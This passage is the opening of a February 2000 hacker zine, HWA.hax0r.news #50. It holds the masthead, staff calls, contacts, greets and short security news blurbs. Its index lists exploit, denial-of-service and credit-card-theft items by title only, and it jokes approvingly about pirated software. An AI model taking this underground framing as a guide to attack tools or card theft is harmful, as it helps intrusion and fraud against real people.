[63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
=                        <=-[ HWA.hax0r.news ]-=>                        =
==========================================================================
          [=HWA 2000=] Number 50 Volume 2 Issue 2 1999 Feb 2000
==========================================================================
               [ 61:20:6B:69:64:20:63:6F:75: ]
               [ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
               [ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================
=                      "ABUSUS NON TOLLIT USUM"                          =
==========================================================================
Editor: Cruciphux (cruciphux@dok.org)

A Hackers Without Attitudes Production. (c) 1999, 2000

http://welcome.to/HWA.hax0r.news/
==========================================================================

This is #50 covering Jan 16th to Feb 13th, 2000
==========================================================================
"Taking a fat cross section of the underground and security scene today
and laying it in your lap for tomorrow."
==========================================================================

How Can I Help ??
~~~~~~~~~~~~~~~~~

I'm looking for staff members to help with putting the zine together. If you
want your name in lights (ie: mad propz and credz in here) and have the time
to spare, then here are some of the areas I can use help in:

The Big One:
~~~~~~~~~~~

Text to HTML project: This entails converting all existing texts to HTML and
including, where appropriate, hyperlinks for the URLs mentioned in the text.

Foreign Correspondents and Translators
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

I'm also looking for people willing to translate articles from their area
(usually Dutch, German, Norwegian etc), to contribute articles and if possible
translate them into English for us. You will be marked as HWA staff on our
list; please include your email and website info, and bio if you wish to do
so, none of this is required however. Your help is appreciated!

Site Design
~~~~~~~~~~~

I need some design ideas for the website. I've temporarily revamped it but I'd
like to test some new look and feel ideas. If you're a web wizard and want to
try your hand at making us a site, email me, and go for it. Be warned that we
may NOT use your design, but don't let that stop you from trying your hand at
it. An online temp/demo site would be helpful.

News Collection:
~~~~~~~~~~~~~~~

There are a LOT of sources and resources, many listed here and others in the
ether. Search these or pick a few of these sources to search for stories of
interest and email them to me. Scan for hacked, hacking, cracked, cracking,
defacement, DoS attack, cyber, cyberwar, etc as an example.

CGI and PERL script programming
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

I'd like to make the zine contents searchable by keyword/issue online and also
display the indexes of online copies of the newsletter. If you have any ideas
for this let me know. I could do it myself but if you already have a project
laying around that would do for this then why reinvent the wheel?

Also; data grabbers that will snag the news from sites like HNN and strip the
HTML off and email the raw news data, etc, headline collectors for
security-focus and packetstorm etc are all also good ideas.

There's more of course, if you have something you'd like to contribute let me
know and I'll find something for you to do.

Thanks for listening

cruciphux@dok.org

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@
#                                                                         @
@   The HWA website is sponsored by CUBESOFT communications. I highly     #
#   recommend you consider these people for your web hosting needs,       @
@                                                                         #
#   Web site sponsored by CUBESOFT networks http://www.csoft.net          @
@   check them out for great fast web hosting!                            #
#                                                                         @
#   http://www.csoft.net/~hwa                                             @
@                                                                         #
@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

SYNOPSIS (READ THIS)
--------------------

The purpose of this newsletter is to 'digest' current events of interest that
affect the online underground and netizens in general. This includes coverage
of general security issues, hacks, exploits, underground news and anything
else I think is worthy of a look-see. (Remember I'm doing this for me, not
you; the fact some people happen to get a kick/use out of it is of secondary
importance.)

This list is NOT meant as a replacement for, nor to compete with, the likes
of publications such as CuD or PHRACK or with news sites such as AntiOnline,
the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN, nor
could any other 'digest' of this type do so.
It *is* intended however, to complement such material and provide a reference
to those who follow the culture by keeping tabs on as many sources as possible
and providing links to further info. It's a labour of love and will be
continued for as long as I feel like it. I'm not motivated by dollars or the
illusion of fame; did you ever notice how the most famous/infamous hackers are
the ones that get caught? There's a lot to be said for remaining just outside
the circle...

@HWA

=-----------------------------------------------------------------------=
                     Welcome to HWA.hax0r.news ...
=-----------------------------------------------------------------------=

"If life is a waste of time and time is a waste of life, then let's all get
wasted and have the time of our lives" - kf

Catch us on Internet Relay Chat, Eris Free Net... /join #HWA.hax0r.news

**************************************************************************
***  /join #HWA.hax0r.news on EFnet the key is `zwen' when keyed       ***
***                                                                    ***
***  please join to discuss or impart news on the zine and around the  ***
***  scene or just to hang out, we get some interesting visitors, you  ***
***  could be one of em.                                               ***
***                                                                    ***
***  Note that the channel isn't there to entertain you; its purpose   ***
***  is to bring together people interested and involved in the        ***
***  underground to chat about current and recent events etc, do drop  ***
***  in to talk or hang out. Also if you want to promo your site or    ***
***  send in news tips it's the place to be, just remember we're not   ***
***  #hack or #chatzone...                                             ***
**************************************************************************

=--------------------------------------------------------------------------=
                  [ INDEX ] HWA.hax0r.news #50
=--------------------------------------------------------------------------=
Key Intros
=--------------------------------------------------------------------------=

00.0 .. LEGAL & COPYRIGHTS
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC
00.2 .. THIS IS WHO WE ARE

ABUSUS NON TOLLIT USUM? This is (in case you hadn't guessed) Latin, and
loosely translated it means "Just because something is abused, it should not
be taken away from those who use it properly." This is our new motto.

=--------------------------------------------------------------------------=
Key Content
=--------------------------------------------------------------------------=

"The three most dangerous things in the world are a programmer with a
soldering iron, a hardware type with a program patch and a user with an
idea." - Unknown

01.0 .. GREETS
01.1 .. Last minute stuff, rumours, newsbytes
01.2 .. Mailbag
02.0 .. From the Editor
03.0 .. Slash, Croatian cracker, speaks out
04.0 .. The hacker sex chart 2000
05.0 .. Peer finally arrested after over a decade of IRC terrorism
06.0 .. Updated proxies list from IRC4ALL
07.0 .. Rant: Mitnick to go wireless?
08.0 .. Distributed Attacks on the rise. TFN and Trinoo.
09.0 .. Teen charged with hacking, flees to Bulgaria, still gets busted
10.0 .. Major security flaw in Microsoft (Say it ain't so!! haha)
11.0 .. Cerberus Information Security Advisory (CISADV000126)
12.0 .. "How I hacked Packetstorm Security" by Rainforest Puppy
13.0 .. stream.c exploit
14.0 .. Spank, variation of the stream.c DoS
15.0 .. Canadian Security Conference announcement: CanSecWest
16.0 .. Security Portal Review Jan 16th
17.0 .. Security Portal review Jan 24th
18.0 .. Security Portal review Jan 31st
19.0 .. CRYPTOGRAM Jan 15th
20.0 .. POPS.C qpop vulnerability scanner by Duro
21.0 .. Hackunlimited special birthday free-cdrom offer
22.0 .. HACK MY SYSTEM! I DARE YA! (not a contest)
23.0 .. PWA lead member busted by the FBI
24.0 .. Mitnick's Release Statement
24.1 .. More submitted Mitnick articles
25.0 .. Hackers vs Pedophiles, taking on a new approach
26.0 .. SCRAMDISK (Windows) on the fly encryption for your data
27.0 .. HNN: Jan 17: MPAA files more suits over DeCSS
28.0 .. WARftpd Security Alert (Will they EVER fix this software??)
29.0 .. HNN: Jan 17th: Seven eCommerce Sites Found Vulnerable
30.0 .. HNN: Jan 17: Scotland Yard Investigating Cyber Ransom Demands
31.0 .. HNN: Jan 17: Pay Phone Fraud Committed with Drinking Straw
32.0 .. Owning sites that run WebSpeed web db software
33.0 .. Cerberus Information Security Advisory (CISADV000202)
34.0 .. Security Focus Newsletter #26
35.0 .. HNN: Jan 17: NY Student Arrested After Damaging School Computer
36.0 .. HNN: Jan 17: NSA Wants A Secure Linux
37.0 .. HNN: Jan 17: Cryptome may be breaking the law
38.0 .. HNN: Jan 21: H4g1s Member Sentenced to Six Months
39.0 .. HNN: Jan 21: Smurf Attack Felt Across the Country
40.0 .. HNN: Jan 21: CIHost.com Leaves Customer Info On the Net
41.0 .. HNN: Jan 21: False Bids Submitted, Hackers Blamed
42.0 .. HNN: Jan 21: UK to create cyber force
43.0 .. HNN: Jan 21: Army Holds Off Cyber Attack
44.0 .. HNN: Jan 24: French smart card expert goes to trial
45.0 .. HNN: Jan 24: Palm HotSync Manager is Vulnerable to DoS Attack
46.0 .. HNN: Jan 24: Viruses Cost the World $12.1 Billion
47.0 .. HNN: Jan 24: L0pht and @Stake Create Controversy ($)
48.0 .. HNN: Jan 24: Several New Ezine Issues Available
49.0 .. HNN: Jan 25: AIM Accounts Susceptible to Theft
50.0 .. HNN: Jan 25: Outpost Leaks Customer Info
51.0 .. HNN: Jan 25: DeCSS Author Raided
52.0 .. HNN: Jan 25: Solaris May Go Free and Open
53.0 .. HNN: Jan 25: Documents Prove Echelon not a Journalist Fabrication
54.0 .. HNN: Jan 25: Japan Needs US Help With Defacements
55.0 .. HNN: Jan 25: Car Radios Monitored by Marketers
56.0 .. HNN: Jan 26: DoubleClick Admits to Profiling of Surfers
57.0 .. HNN: Jan 26: Support for DeCSS Author Grows
58.0 .. HNN: Jan 26: China To Require Crypto Registration
59.0 .. HNN: Jan 26: NEC Develops Network Encryption Technology
60.0 .. HNN: Jan 26: UPS announces Worldtalk secure email
61.0 .. HNN: Jan 27: Napster Reveals Users Info
62.0 .. Dissecting the Napster system
63.0 .. HNN: Jan 27: DVD Lawyers Shut Down Courthouse
64.0 .. HNN: Jan 27: Yahoo May Be Violating Texas Anti-Stalking Law
65.0 .. HNN: Jan 27: Data From Probes of Takedown.com
66.0 .. HNN: Jan 27: Top Ten Viruses of 1999
67.0 .. HNN: Jan 27: French Eavesdrop on British GSM Phones
68.0 .. So wtf is the deal with l0pht and @stake? here'$ the FAQ jack
69.0 .. Anti-Offline releases majorly ereet 0-day script kiddie juarez!
70.0 .. HNN: Jan 31: MS Issues Security Patch for Windows 2000
71.0 .. HNN: "Have script Will destroy" - a buffer overflow article
72.0 .. HNN: Cert Warning? : what me worry?? - buffer overflow article
73.0 .. HNN: The Japanese Panic Project - buffer overflow article
74.0 .. HNN: Jan 31: Bulgarian Indicted for Cyber Crime
75.0 .. HNN: Jan 31: Online Banking Still Immature
76.0 .. HNN: Jan 31: E-Mail Scanning System In Progress
77.0 .. HNN: Jan 31: USA Today Headlines Changed
78.0 .. HNN: Jan 31: @Stake and L0pht
79.0 .. HNN: Jan 31: Book Review: "Database Nation"
80.0 .. HNN: Feb 1st: Interview with DeCSS Author
81.0 .. HNN: Feb 1st: X.com Denies Security Breach
82.0 .. HNN: Feb 1st: Microsoft Security, An Oxymoron?
83.0 .. HNN: Feb 1st: Cringely, Defcon, E-Commerce and Crypto
84.0 .. HNN: Feb 1st: Cold War Spies For Hire
85.0 .. HNN: Feb 1st: More Ezines Available
86.0 .. HNN: Feb 2nd: WorldWide Protest Against MPAA Planned
87.0 .. HNN: Feb 2nd: DoubleClick Receiving Protests
88.0 .. HNN: Feb 2nd: More CC Numbers Found on Net
89.0 .. HNN: Feb 2nd: Clinton Cyber Security Plan Draws Fire
90.0 .. HNN: Feb 2nd: AntiPiracy Campaign Increases Sales
91.0 .. HNN: Feb 2nd: Web Apps, the New Playground
92.0 .. HNN: Feb 3rd: Malicious HTML Tags Embedded in Client Web Requests
93.0 .. HNN: Feb 3rd: Curador Posts More CC Numbers
94.0 .. HNN: Feb 3rd: IETF Says No To Inet Wiretaps
95.0 .. HNN: Feb 3rd: Medical Web Sites Leak Privacy Info
96.0 .. HNN: Feb 4th: 27 Months for Piracy
97.0 .. Have you been looking for www.hack.co.za?
98.0 .. HNN: Feb 4th: Security Holes Allow Prices to be Changed
99.0 .. ThE,h4x0r.Br0z toss us a dis
100.0 .. HNN: Feb 4th: Carders Congregate in IRC
101.0 .. HNN: Feb 4th: Tempest Tutorial and Bug Scanning 101
102.0 .. HNN: Feb 7th: Mitnick to Give Live Interview
103.0 .. HNN: Feb 7th: Anti MPAA Leafletting Campaign a Huge Success
104.0 .. HNN: Feb 7th: Founding Member of PWA Busted
105.0 .. HNN: Feb 7th: Teenager Busted for Attempted Cyber Extortion of $500
106.0 .. HNN: Feb 7th: Japanese Plan to Fight Cyber Crime
107.0 .. HNN: Feb 7th: Philippine President Web Site Defaced
108.0 .. HNN: Feb 8th: Software Companies Seek to Alter Contract Law
109.0 .. HNN: Feb 8th: Yahoo Taken Offline After Suspected DoS Attack
110.0 .. HNN: Feb 8th: New Hack City Video
111.0 .. HNN: Feb 8th: Thailand E-commerce Site Stored Credit Cards on Mail Server
112.0 .. HNN: Feb 8th: Script Kiddie Training
113.0 .. HNN: Feb 8th: Personal CyberWars
114.0 .. HNN: Feb 8th: Space Rogue Profiled by Forbes
115.0 .. HNN: Feb 9th: Yahoo, Buy.com, Amazon, E-Bay, CNN, UUNet, Who's Next?
116.0 .. Trinoo Killer Source Code
117.0 .. Mixter's guide to defending against DDoS attacks
118.0 .. HNN: Feb 9th: Court Authorizes Home Computer Search
119.0 .. HNN: Feb 9th: MPAA Makes Deceptive Demands
120.0 .. HNN: Feb 9th: Medical Sites Give Out Info
121.0 .. HNN: Feb 9th: FTC Investigates Amazon Subsidiary on use of Customer Info
122.0 .. HNN: Feb 9th: Sys Admins Possibly At Fault in Japanese Defacements
123.0 .. HNN: Feb 9th: Anonymity and Tracking of the Malicious Intruder
124.0 .. HNN: Feb 10th: E-Trade, LA Times, Datek, ZD-Net Join List of Sites
125.0 .. HNN: Feb 10th: NIPC Releases Detection Tools
126.0 .. HNN: Feb 10th: The Underground Reaction
127.0 .. HNN: Feb 10th: Haiku Worm Now on the Loose
128.0 .. HNN: Feb 11th: Investigations Continue, Reports of more Possible Attacks Surface
129.0 .. HNN: Feb 11th: Author of Tool Used in Attacks Speaks
130.0 .. HNN: Feb 11th: NIPC Reissues Alert on DDoS
131.0 .. HNN: Feb 11th: Lawmakers Succumb to Kneejerk Reaction
132.0 .. HNN: Feb 11th: Humor in the Face of Chaos
133.0 .. HNN: Feb 11th: Britain Passes Despotic Laws
134.0 .. HNN: Feb 11th: France Sues US and UK over Echelon
135.0 .. HNN: Feb 11th: Melissa Virus Comes Back
136.0 .. HWA: aKt0r's story by wyzewun
137.0 .. ISN: Jan 16: Hacker gang blackmails firms with stolen files
138.0 .. How to steal 2,500 credit cards
139.0 .. Good IDS article from Security Portal
140.0 .. Win2000 security hole a 'major threat'
141.0 .. New hack attack is greater threat than imagined
142.0 .. NSA gets bitten in the ass too
143.0 .. rzsz package calls home if you don't register the software
144.0 .. Clinton calls Internet Summit on the DDoS threat
145.0 .. ISN: Who gets your trust?
146.0 .. ISN: Hackers demand 10 Million pounds from Visa
147.0 .. ISN: Cybercrime growing harder to prosecute
148.0 .. ISN: Hacking Exposed (Book review) By Brian Martin
149.0 .. ISN: The crime of punishment by Brian Martin
150.0 .. ISN: EDI Security, Control and Audit (Book review) by Brian Martin
151.0 .. ISN: "Remember, some 'hackers' make house calls" ie: burglary
152.0 .. ISN: Japanese Police crack down on hacker attacks
153.0 .. ISN: Behind the scenes at "Hackers Inc."
154.0 .. ISN: Hackers a No-Show at DVD decryption protest (!???)
155.0 .. ISN: need C2 security? - stick with NT 4.0 by Susan Menke
156.0 .. ISN: Sites cracked with id's and passwords
157.0 .. ISN: Who are these jerks anyway?
158.0 .. Hellvisory #001 - Domain Name Jacking HOW-TO by Lucifer
159.0 .. SSHD Buffer overflow exploit (FreeBSD)
160.0 .. Mozilla curiosity
161.0 .. Any user can make hard links in Unix
162.0 .. Crash windows boxes on local net (twinge.c)
163.0 .. SpiderMap 0.1 Released
164.0 .. Windows Api SHGetPathFromIDList Buffer Overflow
165.0 .. Anywhere Mail Server Ver.3.1.3 Remote DoS
166.0 .. .ASP error shows full source code to caller
167.0 .. Bypassing authentication on Axis 700 Network Scanner
168.0 .. Novell Bordermanager 3.0 through 3.5 is vulnerable to a slow DoS
169.0 .. CERN 3.0A Heap overflow advisory
170.0 .. Cfingerd 1.3.3 (*BSD) remote root buffer overflow exploit
171.0 .. FreeBSD 3.4-STABLE /usr/bin/doscmd local exploit
172.0 .. FireWall-1 FTP Server Vulnerability Background Paper #1
173.0 .. Fool firewalls into opening ports with PASV
174.0 .. InetServ 3.0 remote DoS exploit
175.0 .. ppp 1.6.14 shows local user the saved PPP password
176.0 .. Another screw up in MS's Java Virtual Machine, breaks security
177.0 .. mySQL password checking routines insecure
178.0 .. Guninski: Outlook and Active Scripting (again, sigh...)
179.0 .. Break a BeOS poorman server remotely with url infusion
180.0 .. Proftpd (<= pre6) linux ppc remote exploit
181.0 .. Insecure defaults in SCO openserver 5.0.5 leaves the doors open
182.0 .. Malformed link in SERVU then a list = instant DoS (crash!)
183.0 .. FreeBSD 3.3-RELEASE /sbin/umount local exploit
184.0 .. Yet another War-ftpd vulnerability (why do ppl use this?)
185.0 .. Z0rk a Zeus Web Server DoS
186.0 .. Following up on the DDOS attacks of the past week (various)
187.0 .. InetServ 3.0 - Windows NT - Remote Root Exploit
188.0 .. Bugfest! Win2000 has 63,000 'defects'
189.0 .. Legit Hackers Roam Cyberspace for Security
190.0 .. Deutch controversy raises security questions for Internet users
191.0 .. PC's Vulnerable to Security Breaches, Experts Say
192.0 .. Hacking hazards come with Web scripting territory
193.0 .. Microsoft battles pair of security bugs
194.0 .. Ex-CIA chief surfed Web on home computer with top-secret data
195.0 .. How Safe Is AOL 5.0?
196.0 .. Teens steal thousands of net accounts
197.0 .. Online Credit Hacker May Be Out For Profit

=-------------------------------------------------------------------------=

AD.S .. Post your site ads or etc here, if you can offer something in return
        that's tres cool, if not we'll consider ur ad anyways so send it in.
        Ads for other zines are ok too btw just mention us in yours, please
        remember to include links and an email contact.
Ha.Ha .. Humour and puzzles
         Oi! laddie! send in humour for this section! I need a laugh and
         it's hard to find good stuff... ;)
SITE.1 .. Featured site
H.W .. Hacked Websites
A.0 .. APPENDICES
       * COMMON TROJAN PORTS LISTING
A.1 .. PHACVW linx and references
A.2 .. Hot Hits (.gov and .mil + other interesting traffic on our site)
A.3 .. Mirror Sites list
A.4 .. The Hacker's Ethic 90's Style
A.5 .. Sources
A.6 .. Resources
A.7 .. Submission information
A.8 .. Mailing lists information
A.9 .. What's in a name? why HWA.hax0r.news??
A.10 .. HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again).
A.11 .. Underground and (security?) Zines

* Feb 2000 moved opening data to appendices, A.2 through A.10, probably more
  to be added. Quicker to get to the news, and info etc... - Ed

=--------------------------------------------------------------------------=

@HWA'99, 2000

00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE
PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY
FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND)
SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).

Important semi-legalese and license to redistribute:

YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED
THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux AND/OR
HWA.hax0r.news ARE MENTIONED IN YOUR WRITING.
LINKS ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED
the current link is http://welcome.to/HWA.hax0r.news

IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE
IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY
current email cruciphux@dok.org

THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE (C)
AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND COMMENTARIES
ARE THEREFORE (C) WHICH MEANS:

I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND
REDISTRIBUTE/MIRROR. - EoD

** USE NO HOOKS **

Although this file and all future issues are now copyright, some of the
content holds its own copyright and these are printed and respected. News is
news so I'll print any and all news but will quote sources when the source is
known; if it's good enough for CNN it's good enough for me. And I'm doing it
for free on my own time so pfffft. :)

No monies are made or sought through the distribution of this material. If
you have a problem or concern email me and we'll discuss it.

HWA (Hackers Without Attitudes) is not affiliated with HWA (Hewlitts Warez
Archive?), and does not condone 'warez' in any shape manner or form, unless
they're good, fresh 0-day and on a fast site.

cruciphux@dok.org

Cruciphux [C*:.]
HWA/DoK Since 1989

00.1 CONTACT INFORMATION AND MAIL DROP
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Wahoo, we now have a mail-drop. If you are outside of the U.S.A or Canada /
North America (hell even if you are inside ..) and wish to send printed matter
like newspaper clippings, a subscription to your cool foreign hacking zine or
photos, small non-explosive packages or sensitive information etc etc, well,
now you can. (w00t) Please no more inflatable sheep or plastic dog droppings,
or fake vomit thanks.

Send all goodies to:

      HWA NEWS
      P.O BOX 44118
      370 MAIN ST. NORTH
      BRAMPTON, ONTARIO
      CANADA
      L6V 4H5

WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you
~~~~~~~  are reading this from some interesting places, make my day and get a
mention in the zine, send in a postcard. I realize that some places it is cost
prohibitive but if you have the time and money be a cool dude / gal and send a
poor guy a postcard, preferably one that has some scenery from your place of
residence for my collection. I collect stamps too so you kill two birds with
one stone by being cool and mailing in a postcard, return address not
necessary, just a "hey guys being cool in Bahrain, take it easy" will do ...
;-) thanx.

Ideas for interesting 'stuff' to send in apart from news:

- Photo copies of old system manual front pages (optionally signed by you)
- Photos of yourself, your mom, sister, dog and or cat in a NON compromising
  position plz I don't want pr0n.
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes
  with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone fun or
  social engineering examples or transcripts thereof.

Stuff you can email:

- Prank phone calls in .ram or .mp* format
- Fone tones and security announcements from PBX's etc
- fun shit you sampled off yer scanner
- reserved for one smiley face -> :-) <-
- PHACV lists of files that you have or phac cd's you own (we have a burner)
- burns of phac cds (email first to make sure we don't already have em)
- Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc

If you still can't think of anything you're probably not that interesting a
person after all so don't worry about it

Our current email:

Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas2@usa.net

Other methods:

Cruciphux's ICQ: 58939315
note; not always online, and do not abuse or use for lame questions!

My Preferred chat method: IRC Efnet in #HWA.hax0r.news

@HWA

00.2 THIS IS WHO WE ARE
     ~~~~~~~~~~~~~~~~~~

Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/programming/IRC+ man in black
sas2@usa.net .............: currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black
twisted-pair@home.com.....: currently active/programming/IRC+

Foreign Correspondents/affiliate members (Active)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Qubik ............................: United Kingdom
D----Y ...........................: USA/world media
Zym0t1c ..........................: Dutch/Germany/Europe
Sla5h.............................: Croatia
Spikeman .........................: World Media/IRC channel enforcer
HWA members ......................: World Media
Armour (armour@halcon.com.au).....: Australia
Wyze1.............................: South Africa

Past Foreign Correspondents (currently inactive or presumed dead)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

N0Portz ..........................: Australia
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck .........................: Netherlands/Holland

Please send in your sites for inclusion here if you haven't already, also if
you want your emails listed send me a note ... - Ed

Spikeman's site is down as of this writing, if it comes back online it will
be posted here.

http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)

Sla5h's email: smuddo@yahoo.com

*******************************************************************
***       /join #HWA.hax0r.news on EFnet the key is `zwen'      ***
*******************************************************************

:-p

1. We do NOT work for the government in any shape or form. Unless you count
   paying taxes ... in which case we work for the gov't in a BIG WAY. :-/

2. MOSTLY Unchanged since issue #1, although issues are a digest of recent
   news events it's a good idea to check out issue #1 at least and possibly
   also the Xmas 99 issue for a good feel of what we're all about, otherwise
   enjoy - Ed ...

@HWA

01.0 Greets!?!?!
yeah greets! w0w huh. - Ed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ____ _ / ___|_ __ ___ ___| |_ ___ | | _| '__/ _ \/ _ \ __/ __| | |_| | | | __/ __/ |_\__ \ \____|_| \___|\___|\__|___/ Thanks to all in the community for their support and interest but I'd like to see more reader input, help me out here, what's good, what sucks etc, not that I guarantee I'll take any notice mind you, but send in your thoughts anyway. * all the people who sent in cool emails and support FProphet Pyra TwstdPair _NeM_ D----Y Dicentra vexxation sAs72 Spikeman p0lix Vortexia Wyze1 Pneuma Raven Zym0t1c duro Repluzer astral BHZ ScrewUp Qubik gov-boi _Jeezus_ Haze_ thedeuce ytcracker loophole BlkOps vetesgirl Slash bob- CHEVY* Dragos Ruiu pr0xy Folks from #hwa.hax0r.news and other leet secret channels, *grin* - mad props! ... ;-) Ken Williams/tattooman ex-of PacketStorm, & Kevin Mitnick (free at last) Kevin is due to be released from federal prison on January 21st 2000, for more information on his story visit http://www.freekevin.com/ kewl sites: + http://blkops.venomous.net/ NEW + http://www.hack.co.za NEW -> ** Due to excessive network attacks this site is now being mirrored at http://www.siliconinc.net/hack/ + http://blacksun.box.sk. NEW + http://packetstorm.securify.com/ NEW + http://www.securityportal.com/ NEW + http://www.securityfocus.com/ NEW + http://www.hackcanada.com/ + http://www.l0pht.com/ + http://www.2600.com/ + http://www.freekevin.com/ + http://www.genocide2600.com/ + http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/ + http://www.slashdot.org/ + http://www.freshmeat.net/ + http://www.403-security.org/ + http://ech0.cjb.net/ @HWA 01.1 Last minute stuff, rumours and newsbytes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ _ _ ____ _ | \ | | _____ _____| __ ) _ _| |_ ___ ___ | \| |/ _ \ \ /\ / / __| _ \| | | | __/ _ Y __| | |\ | __/\ V V /\__ \ |_) | |_| | || __|__ \ |_| \_|\___| \_/\_/ |___/____/ \__, |\__\___|___/ |___/ "What is popular isn't always right, and what is right isn't always popular..." - FProphet '99 Since we provide only the links in this section, be prepared for 404's - Ed +++ When was the last time you backed up your important data? ++ Phony Tragedy Site Has Virus Contributed by Slash Alaska Airlines warns that a Web site seeking donations for victims of Flight 261 is a phony and that it is carrying a virus. Full Story ++ Tough U.S. Bank Privacy Regs Contributed by Slash U.S. regulators took a tough line Thursday on privacy protection for personal financial information included in a historic overhaul of Depression-era U.S. banking laws Full Story ++ Patch Available for the Recycle Bin Creation Vulnerability Contributed by Slash Microsoft has released a patch that eliminates a security vulnerability in Windows NT 4.0. This hole allows a malicious user to create, delete or modify files in the Recycle Bin of another user who shared the machine. Full Story ++ Behind the Scenes at 'Hackers, Inc.' Contributed by Slash Professional hackers roam Net to keep companies--and data--secure. Full Story ++ The Net’s Dark Side: Protecting Your Privacy May Empower Criminals Contributed by Slash Surfing the Web. You thought you knew how dangerous it could be. But many Americans might be astonished at how easy it is to uncover the most sensitive personal information.
Full Story ++ RSA Security's Industry-Leading Encryption Technology Offered in OpenSite AuctionNow and OpenSite Dynamic Pricing Toolkit Contributed by Slash Full Story ++ Essential Security for DSL and Cable Modem Users Contributed by Slash Zone Labs, Inc., today announced the immediate availability of the new ZoneAlarm 2.0 Internet security utility. Full Story ++ F-Secure, Hewlett Packard team up in WAP security Contributed by Slash Finnish computer security company F-Secure said on Thursday it would develop security for Internet-enabled Wireless Application Protocol (WAP) Full Story ++ Experts Warn of Web Surfing Risk Contributed by Slash Computer experts are warning of a serious new Internet security threat that allows hackers to launch malicious programs on a victim's computer Full Story ++ Teen Hacker's Home Raided (Business Tuesday) http://www.wired.com/news/business/0,1367,33889,00.html?tw=wn20000126 The home of the 16-year-old hacker who launched three major lawsuits was raided Monday in Norway, and the international hacking community is reeling from the news. By Lynn Burke. ++ Echelon 'Proof' Discovered (Politics 3:00 a.m. PST) http://www.wired.com/news/politics/0,1283,33891,00.html?tw=wn20000126 NSA documents refer to 'Echelon.' Is it the suspected international citizen spying machine or the name of a legal military project? The researcher who found them thinks it's the latter. By Chris Oakes. ++ Vodafone Gets Its Mannesmann (Business 6:00 a.m. PST) http://www.wired.com/news/business/0,1367,34077,00.html?tw=wn20000203 The three-month-long hostile bid by Britain's telecom giant is finally about to end ... in a friendly takeover. ++ VA Linux Snaps Up Andover (Business 6:50 a.m. PST) http://www.wired.com/news/business/0,1367,34076,00.html?tw=wn20000203 The Linux software distributor pays an estimated $850 million in stocks and cash for the network of tech-info sites, which includes the esteemed Slashdot. ++ Thumbs Down on Net Wiretaps (Politics 3:00 a.m.
